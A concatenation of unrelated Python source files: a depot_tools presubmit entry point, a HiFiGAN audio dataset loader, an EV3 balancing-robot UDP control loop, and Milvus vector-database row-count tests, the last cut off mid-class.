help=optparse.SUPPRESS_HELP)
parser.add_option("--gerrit_url", help=optparse.SUPPRESS_HELP)
parser.add_option("--gerrit_fetch", action='store_true',
help=optparse.SUPPRESS_HELP)
parser.add_option('--parallel', action='store_true',
help='Run all tests specified by input_api.RunTests in all '
'PRESUBMIT files in parallel.')
parser.add_option('--json_output',
help='Write presubmit errors to json output.')
options, args = parser.parse_args(argv)
if options.verbose >= 2:
logging.basicConfig(level=logging.DEBUG)
elif options.verbose:
logging.basicConfig(level=logging.INFO)
else:
logging.basicConfig(level=logging.ERROR)
change_class, files = load_files(options, args)
if not change_class:
parser.error('For unversioned directory, <files> is not optional.')
logging.info('Found %d file(s).', len(files))
gerrit_obj = None
if options.gerrit_url and options.gerrit_fetch:
assert options.issue and options.patchset
gerrit_obj = GerritAccessor(urlparse.urlparse(options.gerrit_url).netloc)
options.author = gerrit_obj.GetChangeOwner(options.issue)
options.description = gerrit_obj.GetChangeDescription(options.issue,
options.patchset)
logging.info('Got author: "%s"', options.author)
logging.info('Got description: """\n%s\n"""', options.description)
try:
with canned_check_filter(options.skip_canned):
results = DoPresubmitChecks(
change_class(options.name,
options.description,
options.root,
files,
options.issue,
options.patchset,
options.author,
upstream=options.upstream),
options.commit,
options.verbose,
sys.stdout,
sys.stdin,
options.default_presubmit,
options.may_prompt,
gerrit_obj,
options.dry_run,
options.parallel,
options.json_output)
return not results.should_continue()
except PresubmitFailure as e:
print(e, file=sys.stderr)
print('Maybe your depot_tools is out of date?', file=sys.stderr)
return 2
if __name__ == '__main__':
fix_encoding.fix_encoding()
try:
sys.exit(main())
except KeyboardInterrupt:
sys.stderr.write('interrupted\n')
sys.exit(2)
|
HiFiGANDataset.py
|
import os
import random
from multiprocessing import Manager
from multiprocessing import Process
import librosa
import soundfile as sf
import torch
from torch.utils.data import Dataset
from tqdm import tqdm
from Preprocessing.AudioPreprocessor import AudioPreprocessor
class HiFiGANDataset(Dataset):
def __init__(self,
list_of_paths,
cache_dir,
desired_samplingrate=48000,
samples_per_segment=24576, # = 8192 * 3, as I used 8192 for 16kHz previously
loading_processes=40):
os.makedirs(cache_dir, exist_ok=True)
self.samples_per_segment = samples_per_segment
self.desired_samplingrate = desired_samplingrate
self.melspec_ap = AudioPreprocessor(input_sr=desired_samplingrate, output_sr=16000, melspec_buckets=80, hop_length=256, n_fft=1024, cut_silence=False)
# hop length of spec loss must be same as the product of the upscale factors
# samples per segment must be a multiple of hop length of spec loss
_, self._orig_sr = sf.read(list_of_paths[0])
# ^ this is the reason why we must create individual
# datasets and then concat them. If we just did all
# datasets at once, there could be multiple sampling
# rates.
resource_manager = Manager()
self.waves = resource_manager.list()
# make processes
path_splits = list()
process_list = list()
for i in range(loading_processes):
path_splits.append(list_of_paths[i * len(list_of_paths) // loading_processes:(i + 1) * len(list_of_paths) // loading_processes])
for path_split in path_splits:
process_list.append(Process(target=self.cache_builder_process, args=(path_split,), daemon=True))
process_list[-1].start()
for process in process_list:
process.join()
numpy_waves = list(self.waves)
self.waves = list()
for wave in numpy_waves:
self.waves.append(torch.Tensor(wave))
print("{} eligible audios found".format(len(self.waves)))
def cache_builder_process(self, path_split):
for path in tqdm(path_split):
with open(path, "rb") as audio_file:
wave, sr = sf.read(audio_file)
if (len(wave) / sr) > ((self.samples_per_segment + 50) / self.desired_samplingrate): # + 50 is just to be extra sure
# catch files that are too short to apply meaningful signal processing
self.waves.append(librosa.resample(y=wave, orig_sr=self._orig_sr, target_sr=self.desired_samplingrate))
def __getitem__(self, index):
"""
load the audio from the path and clean it.
All audio segments have to be cut to the same length,
according to the NeurIPS reference implementation.
return a pair of cleaned audio and corresponding spectrogram as if it was predicted by the TTS
"""
max_audio_start = len(self.waves[index]) - self.samples_per_segment
audio_start = random.randint(0, max_audio_start)
segment = self.waves[index][audio_start: audio_start + self.samples_per_segment]
resampled_segment = self.melspec_ap.resample(segment) # 16kHz spectrogram as input, 48kHz wave as output, see Blizzard 2021 DelightfulTTS
melspec = self.melspec_ap.audio_to_mel_spec_tensor(resampled_segment.float(), explicit_sampling_rate=16000, normalize=False).transpose(0, 1)[
:-1].transpose(0, 1)
return segment, melspec
def __len__(self):
return len(self.waves)
|
__init__.py
|
import struct
import datetime
import time
import socket
import argparse
import logging
import os
import traceback
import atexit
from threading import Event, Thread
import ncsbench.common.params as p
import ncsbench.common.socket as controll_socket
import ncsbench.common.packet as packet
ev3 = None
#TODO meassure difference in inclination
# ----------- Sensor Methods -----------------
#gyro sensor:
#1. ev3-uart > /sys/class/lego-port/port1/mode
#2. lego-ev3-gyro > /sys/class/lego-port/port1/set_device
def send_sensor_signals(socket, addr, port,
tsr_k, tsstx_k, tasrx_k, taw_k,
seq_number, gyro_rate, motor_pos_left, motor_pos_right, gyro_offset,
motorVoltageApplied_left, motorVoltageApplied_right):
""" Packs all sensory information into predefined packet format and sends over UDP connection
:param socket: UDP socket used to send packets
:param timestamp: Clock-time of the current packet
:param seq_number: Sequence number of the current number
:param gyro_rate: Gyro sensor measurement
:param motor_pos_left: Left motor position
:param motor_pos_right: Right motor position
:return: None
"""
logging.debug("Sending tsrk: %f tsstx_k: %f tasrx_k: %f taw_k: %f",
tsr_k, tsstx_k, tasrx_k, taw_k)
stuff = struct.pack(packet.R2H_PACKET_FORMAT, seq_number,
packet.time2int(tsr_k), packet.time2int(
tsstx_k), packet.time2int(tasrx_k), packet.time2int(taw_k),
packet.sensor2int(gyro_rate), packet.sensor2int(
motor_pos_left), packet.sensor2int(motor_pos_right),
packet.sensor2int(gyro_offset), packet.sensor2int(motorVoltageApplied_left), packet.sensor2int(motorVoltageApplied_right))
socket.sendto(stuff, (addr, port))
# For reading from the sensor files
def SensorRead(infile):
infile.seek(0)
return float(infile.read().decode().strip())
def calibrate_gyro(gyroSensorValueRaw):
gyroOffset = 0.0
gyroRateCalibrateCount = 200
for i in range(gyroRateCalibrateCount):
gyro = SensorRead(gyroSensorValueRaw)
logging.debug("S: Gyro reading %d: %f", i, gyro)
gyroOffset = gyroOffset + gyro
time.sleep(0.01)
gyroOffset = gyroOffset / gyroRateCalibrateCount
return gyroOffset
def init_sensors():
""" Instantiates and calibrates both gyro sensor and motors
:return: Gyro and EV3Motors instances
"""
# Create EV3 resource objects
gyroSensor = ev3.GyroSensor(ev3.sensors[argv.gyro_port])
time.sleep(0.1)#work around for https://github.com/ev3dev/ev3dev-lang-python/issues/234
gyroSensor.mode = gyroSensor.MODE_GYRO_RATE
touch1=ev3.TouchSensor(ev3.sensors[argv.touch_1_port])
touch2=ev3.TouchSensor(ev3.sensors[argv.touch_2_port])
motorLeft = ev3.LargeMotor(ev3.motors[argv.motor_l_port])
motorRight = ev3.LargeMotor(ev3.motors[argv.motor_r_port])
# Open sensor and motor files
gyroSensorValueRaw = open(gyroSensor._path + "/value0", "rb")
# Reset the motors
motorLeft.reset()
motorRight.reset()
motorLeft.run_direct()
motorRight.run_direct()
motorEncoderLeft = open(motorLeft._path + "/position", "rb")
motorEncoderRight = open(motorRight._path + "/position", "rb")
return gyroSensorValueRaw, motorEncoderLeft, motorEncoderRight,touch1,touch2
# ----------- Actuator Methods -----------------
# For writing to motor files
def MotorWrite(outfile, value):
outfile.truncate(0)
outfile.write(str(int(value)))
outfile.flush()
# Function to set the duty cycle of the motors
def SetDuty(motorDutyFileHandle, voltage):
# Voltage to PWM and cast to int
duty = int(round(voltage*100/8.087))
# Clamp the value between -100 and 100
if duty > 0:
duty = min(100, duty)
elif duty < 0:
duty = max(-100, duty)
# Apply the signal to the motor
MotorWrite(motorDutyFileHandle, duty)
def init_actuators():
""" Instantiates and calibrates both gyro sensor and motors
:return: Gyro and EV3Motors instances
"""
motorLeft = ev3.LargeMotor(argv.motors[argv.motor_l_port])
motorRight = ev3.LargeMotor(argv.motors[argv.motor_l_port])
# Reset the motors
motorLeft.reset()
motorRight.reset()
motorLeft.run_direct()
motorRight.run_direct()
motorDutyCycleFile_left = open(motorLeft._path + "/duty_cycle_sp", "w")
motorDutyCycleFile_right = open(motorRight._path + "/duty_cycle_sp", "w")
return motorDutyCycleFile_left, motorDutyCycleFile_right
# ----------- Main Loop -----------------
def main(ts, c_addr, s_port, a_port, c_port, log_enabled,c_sock,runtime):
""" Main function called from __main__
:param ts: Sampling period in milliseconds
:param c_addr: IP address of the controller
:param s_port: Port number to send sensor signals
:param a_port: Port number to receive actuation signals
:param log_enabled: Set to 'True' to activate logging sensor measurements & states into logfile
:param args: args object parsed from commandline and settings file
:return: None
"""
start_time=None
buttons = ev3.Button()
#leds = ev3.Leds()
#leds.set_color(leds.LEFT, leds.RED)
#leds.set_color(leds.RIGHT, leds.RED)
logging.info(
"Lay down the robot.Waiting for ROBOT_CALLIB")
# Initialization of the sensors
gyroSensorValueRaw, \
motorEncoderLeft, motorEncoderRight ,\
touch1,touch2= init_sensors()
logging.debug("Initialized sensors")
# Initialization of the actuators
motorDutyCycleFile_left, motorDutyCycleFile_right = init_actuators()
logging.debug("Initialized actuators")
def stop_fun(data, addr, sock):
global finished
finished=True
c_sock.event[controll_socket.EVENTS.ROBOT_STOP].always.add(stop_fun)
# wait for controller to respond
c_sock.send(controll_socket.EVENTS.READY)
c_sock.event[controll_socket.EVENTS.ROBOT_CALLIB].wait()
# Calibration
gyroOffset = calibrate_gyro(gyroSensorValueRaw)
logging.info("Calibration done.")
ev3.Sound.beep().wait()
#leds.set_color(leds.LEFT, leds.AMBER)
#leds.set_color(leds.RIGHT, leds.AMBER)
def wait_for(f,t,*args):
time.sleep(t)
f(*args)
th=Thread(target=lambda :wait_for(stop_fun,runtime,None,None,None))
c_sock.send(controll_socket.EVENTS.ROBOT_START)
# Initialization of the sensor sockets
udp_socket_sensor = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_socket_sensor.setblocking(0)
udp_socket_sensor.bind(('', s_port))
logging.debug("Initialized sensor UDP socket")
# Initialization of the actuator socket
udp_socket_actuator = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_socket_actuator.setblocking(1)
udp_socket_actuator.settimeout(0.001)
udp_socket_actuator.bind(('', a_port))
logging.debug("Initialized actuator UDP socket")
c_sock.send(controll_socket.EVENTS.ROBOT_START)
# Inits:
next_trigger_time = 0 # he "starts" the loop sending the first message
k = 0
# Aux variables
first_packet = True
buttons = ev3.Button()
seq_no_applied = 0
motor_voltage_applied_left = 0
motor_voltage_applied_right = 0
prediction_count = 0
receptionStarted = False
no_of_sim_steps = 10
voltagePredictions = [0]*2*no_of_sim_steps
tau_RTT = 0
avg_diff = p.SAMPLING_TIME
diff_variance = 0
old_sens_timestamp = time.perf_counter()
tsr_k = time.perf_counter()
tsstx_k = time.perf_counter()
tasrx_k = 0
taw_k = 0
# Robot logging
timenow = datetime.datetime.now()
if log_enabled:
filename = "datalog" + str(timenow.year)+"-" + str(timenow.month)+"-"+str(timenow.day)+"_" + str(
timenow.hour) + "_"+str(timenow.minute) + "_"+str(timenow.second) + ".csv"
f = open(filename, "w")
f.write("gyro,enc_l,enc_r, rtt, prediction_count\n")
outdated_warning_printed = False
while True:
next_trigger_time = time.perf_counter() + ts
k += 1
# Sensor readings
tsr_km1 = tsr_k
tsr_k = time.perf_counter()
gyro = SensorRead(gyroSensorValueRaw)
new_sens_timestamp = time.perf_counter()
enc_l = SensorRead(motorEncoderLeft)
enc_r = SensorRead(motorEncoderRight)
diff_sens_timestamp = new_sens_timestamp - old_sens_timestamp
old_sens_timestamp = new_sens_timestamp
avg_diff = ((k-1) / k) * avg_diff + 1/k * diff_sens_timestamp
diff_variance = ((k - 1) / k) * diff_variance + (1/k) * \
(diff_sens_timestamp - avg_diff) * (diff_sens_timestamp - avg_diff)
# Sensor transmission
try:
tsstx_km1 = tsstx_k
# transmission of a time reply for the controller #TODO in the send_sensor_signal?
tsstx_k = time.perf_counter()
send_sensor_signals(udp_socket_sensor, c_addr, s_port,
tsr_km1, tsstx_km1, tasrx_k, taw_k,
k, gyro, enc_l, enc_r, gyroOffset, motor_voltage_applied_left,
motor_voltage_applied_right)
if receptionStarted:
logging.debug(
"Sensing %d sent at %f with actuation %f", k, tsstx_k, tasrx_k)
# logging.debug("Sensing %d sent at %f" % (k, t0_req_tx_current))
except KeyboardInterrupt:
udp_socket_sensor.close()
return
except socket.error:
return
# Take timestamp after packet was sent
timestamp = time.perf_counter()
# Actuation reception - Use the rest of the time to receive host packets, trying at least once.
while True:
rx_packet = None
try:
while True:
rx_bytes = udp_socket_actuator.recv(packet.H2R_PACKET_SIZE)
rx_packet = rx_bytes[:]
except socket.timeout:
if rx_packet is not None:
if first_packet:
logging.info("Control loop started.")
#leds.set_color(leds.LEFT, leds.GREEN)
#leds.set_color(leds.RIGHT, leds.GREEN)
first_packet = False
start_time=time.perf_counter()
tasrx_k = time.perf_counter() # reception of the time request from the controller
logging.debug("Actuation %d received at %f" % (k, tasrx_k))
receptionStarted = True
data_from_host = struct.unpack(
packet.H2R_PACKET_FORMAT, rx_packet)
seq_no_received = data_from_host[packet.H2R_PACKET_VARS.Seq_number]
# If recieved packet is newer than the one last applied:
if seq_no_received == k:
# Measure round trip time and get appropriate index
tau_RTT = time.perf_counter() - timestamp
# Get voltages
# Current:
voltage_left = float(data_from_host[2])/1000000
voltage_right = float(data_from_host[3])/1000000
# Predictions:
for i in range(no_of_sim_steps):
voltagePredictions[2 *
i] = float(data_from_host[2*i+2])/1000000
voltagePredictions[2*i +
1] = float(data_from_host[2*i+3])/1000000
# Reset prediction counter
prediction_count = 0
motor_voltage_applied_left = voltage_left
motor_voltage_applied_right = voltage_right
time_last_applied = time.perf_counter()
seq_no_applied = seq_no_received
while time.perf_counter() <= next_trigger_time-0.003:
pass
if log_enabled:
f.write("%f,%f,%f,%f,%f\n" % (gyro, enc_l,
enc_r, tau_RTT, prediction_count))
SetDuty(motorDutyCycleFile_left, voltage_left)
SetDuty(motorDutyCycleFile_right, voltage_right)
taw_k = time.perf_counter()
break
else:
pass
# logging.debug('Actuator: Not received %d at %f' % (k, time.perf_counter()))
except KeyboardInterrupt:
udp_socket_actuator.close()
logging.debug("Keyboard interrupt, exiting")
return
except socket.error:
logging.debug("Socket error, exiting")
traceback.print_exc()
return
# Killswitch: if up button pressed, turn off motors and exit
if buttons.up:
SetDuty(motorDutyCycleFile_left, 0)
SetDuty(motorDutyCycleFile_right, 0)
logging.debug("avg_diff: %f, var_diff: %f, sampling_time: %f",
avg_diff, diff_variance, p.SAMPLING_TIME)
logging.info("Control loop stopped.")
#leds.set_color(leds.LEFT, leds.RED)
#leds.set_color(leds.RIGHT, leds.RED)
if log_enabled:
f.close()
exit(0)
if finished:
logging.info("Control loop finished.")
#leds.set_color(leds.LEFT, leds.RED)
#leds.set_color(leds.RIGHT, leds.RED)
if log_enabled:
f.close()
message=bytearray(struct.pack("!d",-1.0))
if log_enabled:
message.extend(open(filename,"rb").read())
os.remove(filename)
c_sock.send(controll_socket.EVENTS.ROBOT_STOP,message)
c_sock.unregister_shutdown()
exit(0)
if touch1.is_pressed or touch2.is_pressed:
stop_time=time.perf_counter()
SetDuty(motorDutyCycleFile_left, 0)
SetDuty(motorDutyCycleFile_right, 0)
logging.info("Control loop stopped.")
#leds.set_color(leds.LEFT, leds.RED)
#leds.set_color(leds.RIGHT, leds.RED)
if log_enabled:
f.close()
time=stop_time-start_time
message=bytearray(struct.pack("!d",time))
if log_enabled:
message.extend(open(filename,"rb").read())
os.remove(filename)
c_sock.send(controll_socket.EVENTS.ROBOT_STOP,message)
c_sock.unregister_shutdown()
exit(0)
# If time's up, break reception loop
if time.perf_counter() >= (next_trigger_time-0.006):
if receptionStarted:
if prediction_count < 10:
tasrx_k = time.perf_counter() # threoretical reception timestamp
if prediction_count > 0:
logging.debug("Prediction step %d, %d",
prediction_count, k)
voltage_left = voltagePredictions[2*prediction_count]
voltage_right = voltagePredictions[2 *
prediction_count+1]
SetDuty(motorDutyCycleFile_left, voltage_left)
SetDuty(motorDutyCycleFile_right, voltage_right)
taw_k = time.perf_counter() # theoretical application timestamp
motor_voltage_applied_left = voltage_left
motor_voltage_applied_right = voltage_right
prediction_count += 1
seq_no_applied += 1
outdated_warning_printed = False
else:
if outdated_warning_printed == False:
logging.debug(
"Warning: No more simulation steps available!")
outdated_warning_printed = True
else:
pass
# Robot logging
if log_enabled:
f.write("%f,%f,%f,%f,%f\n" %
(gyro, enc_l, enc_r, tau_RTT, prediction_count-1))
break
finished=False
argv=None
def run(args):
global ev3,argv
argv=args
ev3 = args.lib
logger = logging.getLogger()
if args.verbose:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
logging.debug("IP address of the controller: %s", args.address)
# Nice to process for better timing performance (needs sudo!)
try:
os.nice(-11)
except PermissionError:
pass
def at_exit():
motorDutyCycleFile_left, motorDutyCycleFile_right = init_actuators()
SetDuty(motorDutyCycleFile_left, 0)
SetDuty(motorDutyCycleFile_right, 0)
atexit.register(at_exit)
main(p.SAMPLING_TIME, args.address, args.sport, args.aport, args.cport, args.logging,args.sock,args.runtime)
|
test_table_count.py
|
import random
import pdb
import pytest
import logging
import itertools
from time import sleep
from multiprocessing import Process
from milvus import IndexType, MetricType
from utils import *
dim = 128
index_file_size = 10
add_time_interval = 3
tag = "1970-01-01"
class TestTableCount:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
5000,
100000,
],
)
def add_vectors_nb(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index_params()
)
def get_simple_index_params(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in cpu mode")
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("Skip PQ Temporary")
return request.param
def test_table_rows_count(self, connect, table, add_vectors_nb):
'''
target: test table rows_count is correct or not
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nb = add_vectors_nb
vectors = gen_vectors(nb, dim)
res = connect.add_vectors(table_name=table, records=vectors)
time.sleep(add_time_interval)
status, res = connect.get_table_row_count(table)
assert res == nb
def test_table_rows_count_partition(self, connect, table, add_vectors_nb):
'''
target: test table rows_count is correct or not
method: create table, create partition and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nb = add_vectors_nb
partition_name = gen_unique_str()
vectors = gen_vectors(nb, dim)
status = connect.create_partition(table, partition_name, tag)
assert status.OK()
res = connect.add_vectors(table_name=table, records=vectors, partition_tag=tag)
time.sleep(add_time_interval)
status, res = connect.get_table_row_count(table)
assert res == nb
def test_table_rows_count_multi_partitions_A(self, connect, table, add_vectors_nb):
'''
target: test table rows_count is correct or not
method: create table, create partitions and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
new_tag = "new_tag"
nb = add_vectors_nb
partition_name = gen_unique_str()
new_partition_name = gen_unique_str()
vectors = gen_vectors(nb, dim)
status = connect.create_partition(table, partition_name, tag)
status = connect.create_partition(table, new_partition_name, new_tag)
assert status.OK()
res = connect.add_vectors(table_name=table, records=vectors)
time.sleep(add_time_interval)
status, res = connect.get_table_row_count(table)
assert res == nb
def test_table_rows_count_multi_partitions_B(self, connect, table, add_vectors_nb):
'''
target: test table rows_count is correct or not
method: create table, create partitions and add vectors in one of the partitions,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
new_tag = "new_tag"
nb = add_vectors_nb
partition_name = gen_unique_str()
new_partition_name = gen_unique_str()
vectors = gen_vectors(nb, dim)
status = connect.create_partition(table, partition_name, tag)
status = connect.create_partition(table, new_partition_name, new_tag)
assert status.OK()
res = connect.add_vectors(table_name=table, records=vectors, partition_tag=tag)
time.sleep(add_time_interval)
status, res = connect.get_table_row_count(partition_name)
assert res == nb
status, res = connect.get_table_row_count(new_partition_name)
assert res == 0
def test_table_rows_count_multi_partitions_C(self, connect, table, add_vectors_nb):
'''
target: test table rows_count is correct or not
method: create table, create partitions and add vectors in one of the partitions,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the table count is equal to the length of vectors
'''
new_tag = "new_tag"
nb = add_vectors_nb
partition_name = gen_unique_str()
new_partition_name = gen_unique_str()
vectors = gen_vectors(nb, dim)
status = connect.create_partition(table, partition_name, tag)
status = connect.create_partition(table, new_partition_name, new_tag)
assert status.OK()
res = connect.add_vectors(table_name=table, records=vectors, partition_tag=tag)
res = connect.add_vectors(table_name=table, records=vectors, partition_tag=new_tag)
time.sleep(add_time_interval)
status, res = connect.get_table_row_count(partition_name)
assert res == nb
status, res = connect.get_table_row_count(new_partition_name)
assert res == nb
status, res = connect.get_table_row_count(table)
assert res == nb * 2
def test_table_rows_count_after_index_created(self, connect, table, get_simple_index_params):
'''
target: test get_table_row_count, after index have been created
method: add vectors in db, and create index, then calling get_table_row_count with correct params
expected: get_table_row_count raise exception
'''
nb = 100
index_params = get_simple_index_params
vectors = gen_vectors(nb, dim)
res = connect.add_vectors(table_name=table, records=vectors)
time.sleep(add_time_interval)
# logging.getLogger().info(index_params)
connect.create_index(table, index_params)
status, res = connect.get_table_row_count(table)
assert res == nb
@pytest.mark.level(2)
def test_count_without_connection(self, table, dis_connect):
'''
target: test get_table_row_count, without connection
method: calling get_table_row_count with correct params, with a disconnected instance
expected: get_table_row_count raise exception
'''
with pytest.raises(Exception) as e:
status = dis_connect.get_table_row_count(table)
def test_table_rows_count_no_vectors(self, connect, table):
'''
target: test table rows_count is correct or not, if table is empty
method: create table and no vectors in it,
assert the value returned by get_table_row_count method is equal to 0
expected: the count is equal to 0
'''
table_name = gen_unique_str()
param = {'table_name': table_name,
'dimension': dim,
'index_file_size': index_file_size}
connect.create_table(param)
status, res = connect.get_table_row_count(table)
assert res == 0
# TODO: enable
@pytest.mark.level(2)
@pytest.mark.timeout(20)
def _test_table_rows_count_multiprocessing(self, connect, table, args):
'''
target: test table rows_count is correct or not with multiprocess
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nq = 2
uri = "tcp://%s:%s" % (args["ip"], args["port"])
vectors = gen_vectors(nq, dim)
res = connect.add_vectors(table_name=table, records=vectors)
time.sleep(add_time_interval)
def rows_count(milvus):
status, res = milvus.get_table_row_count(table)
logging.getLogger().info(status)
assert res == nq
process_num = 8
processes = []
for i in range(process_num):
milvus = get_milvus()
milvus.connect(uri=uri)
p = Process(target=rows_count, args=(milvus, ))
processes.append(p)
p.start()
logging.getLogger().info(p)
for p in processes:
p.join()
def test_table_rows_count_multi_tables(self, connect):
'''
target: test table rows_count is correct or not with multiple tables of L2
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nq = 100
vectors = gen_vectors(nq, dim)
table_list = []
for i in range(20):
table_name = gen_unique_str()
table_list.append(table_name)
param = {'table_name': table_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_table(param)
res = connect.add_vectors(table_name=table_name, records=vectors)
time.sleep(2)
for i in range(20):
status, res = connect.get_table_row_count(table_list[i])
assert status.OK()
assert res == nq
class TestTableCountIP:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
5000,
100000,
],
)
def add_vectors_nb(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index_params()
)
def get_simple_index_params(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in open source")
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("Skip PQ Temporary")
return request.param
def test_table_rows_count(self, connect, ip_table, add_vectors_nb):
'''
target: test table rows_count is correct or not
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nb = add_vectors_nb
vectors = gen_vectors(nb, dim)
res = connect.add_vectors(table_name=ip_table, records=vectors)
time.sleep(add_time_interval)
status, res = connect.get_table_row_count(ip_table)
assert res == nb
def test_table_rows_count_after_index_created(self, connect, ip_table, get_simple_index_params):
'''
target: test get_table_row_count, after index have been created
method: add vectors in db, and create index, then calling get_table_row_count with correct params
expected: get_table_row_count raise exception
'''
nb = 100
index_params = get_simple_index_params
vectors = gen_vectors(nb, dim)
res = connect.add_vectors(table_name=ip_table, records=vectors)
time.sleep(add_time_interval)
# logging.getLogger().info(index_params)
connect.create_index(ip_table, index_params)
status, res = connect.get_table_row_count(ip_table)
assert res == nb
@pytest.mark.level(2)
def test_count_without_connection(self, ip_table, dis_connect):
'''
target: test get_table_row_count, without connection
method: calling get_table_row_count with correct params, with a disconnected instance
expected: get_table_row_count raise exception
'''
with pytest.raises(Exception) as e:
status = dis_connect.get_table_row_count(ip_table)
def test_table_rows_count_no_vectors(self, connect, ip_table):
'''
target: test table rows_count is correct or not, if table is empty
method: create table and no vectors in it,
assert the value returned by get_table_row_count method is equal to 0
expected: the count is equal to 0
'''
table_name = gen_unique_str("test_table")
param = {'table_name': table_name,
'dimension': dim,
'index_file_size': index_file_size}
connect.create_table(param)
status, res = connect.get_table_row_count(ip_table)
assert res == 0
# TODO: enable
@pytest.mark.timeout(60)
def _test_table_rows_count_multiprocessing(self, connect, ip_table, args):
'''
target: test table rows_count is correct or not with multiprocess
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nq = 2
uri = "tcp://%s:%s" % (args["ip"], args["port"])
vectors = gen_vectors(nq, dim)
res = connect.add_vectors(table_name=ip_table, records=vectors)
time.sleep(add_time_interval)
def rows_count(milvus):
status, res = milvus.get_table_row_count(ip_table)
logging.getLogger().info(status)
assert res == nq
process_num = 8
processes = []
for i in range(process_num):
milvus = get_milvus()
milvus.connect(uri=uri)
p = Process(target=rows_count, args=(milvus,))
processes.append(p)
p.start()
logging.getLogger().info(p)
for p in processes:
p.join()
def test_table_rows_count_multi_tables(self, connect):
'''
target: test table rows_count is correct or not with multiple tables of IP
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nq = 100
vectors = gen_vectors(nq, dim)
table_list = []
for i in range(20):
table_name = gen_unique_str('test_table_rows_count_multi_tables')
table_list.append(table_name)
param = {'table_name': table_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
connect.create_table(param)
res = connect.add_vectors(table_name=table_name, records=vectors)
time.sleep(2)
for i in range(20):
status, res = connect.get_table_row_count(table_list[i])
assert status.OK()
assert res == nq
class TestTableCountJAC:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
5000,
100000,
],
)
def add_vectors_nb(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index_params()
)
def get_jaccard_index_params(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.IVFLAT or request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
def test_table_rows_count(self, connect, jac_table, add_vectors_nb):
'''
target: test table rows_count is correct or not
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nb = add_vectors_nb
tmp, vectors = gen_binary_vectors(nb, dim)
res = connect.add_vectors(table_name=jac_table, records=vectors)
time.sleep(add_time_interval)
status, res = connect.get_table_row_count(jac_table)
assert res == nb
def test_table_rows_count_after_index_created(self, connect, jac_table, get_jaccard_index_params):
'''
target: test get_table_row_count, after index have been created
method: add vectors in db, and create index, then calling get_table_row_count with correct params
expected: get_table_row_count raise exception
'''
nb = 100
index_params = get_jaccard_index_params
tmp, vectors = gen_binary_vectors(nb, dim)
res = connect.add_vectors(table_name=jac_table, records=vectors)
time.sleep(add_time_interval)
# logging.getLogger().info(index_params)
connect.create_index(jac_table, index_params)
status, res = connect.get_table_row_count(jac_table)
assert res == nb
@pytest.mark.level(2)
def test_count_without_connection(self, jac_table, dis_connect):
'''
target: test get_table_row_count, without connection
method: calling get_table_row_count with correct params, with a disconnected instance
expected: get_table_row_count raise exception
'''
with pytest.raises(Exception) as e:
status = dis_connect.get_table_row_count(jac_table)
def test_table_rows_count_no_vectors(self, connect, jac_table):
'''
target: test table rows_count is correct or not, if table is empty
method: create table and no vectors in it,
assert the value returned by get_table_row_count method is equal to 0
expected: the count is equal to 0
'''
table_name = gen_unique_str("test_table")
param = {'table_name': table_name,
'dimension': dim,
'index_file_size': index_file_size}
connect.create_table(param)
status, res = connect.get_table_row_count(jac_table)
assert res == 0
def test_table_rows_count_multi_tables(self, connect):
'''
target: test table rows_count is correct or not with multiple tables of IP
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nq = 100
tmp, vectors = gen_binary_vectors(nq, dim)
table_list = []
for i in range(20):
table_name = gen_unique_str('test_table_rows_count_multi_tables')
table_list.append(table_name)
param = {'table_name': table_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.JACCARD}
connect.create_table(param)
res = connect.add_vectors(table_name=table_name, records=vectors)
time.sleep(2)
for i in range(20):
status, res = connect.get_table_row_count(table_list[i])
assert status.OK()
assert res == nq
class TestTableCountHAM:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
5000,
100000,
],
)
def add_vectors_nb(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index_params()
)
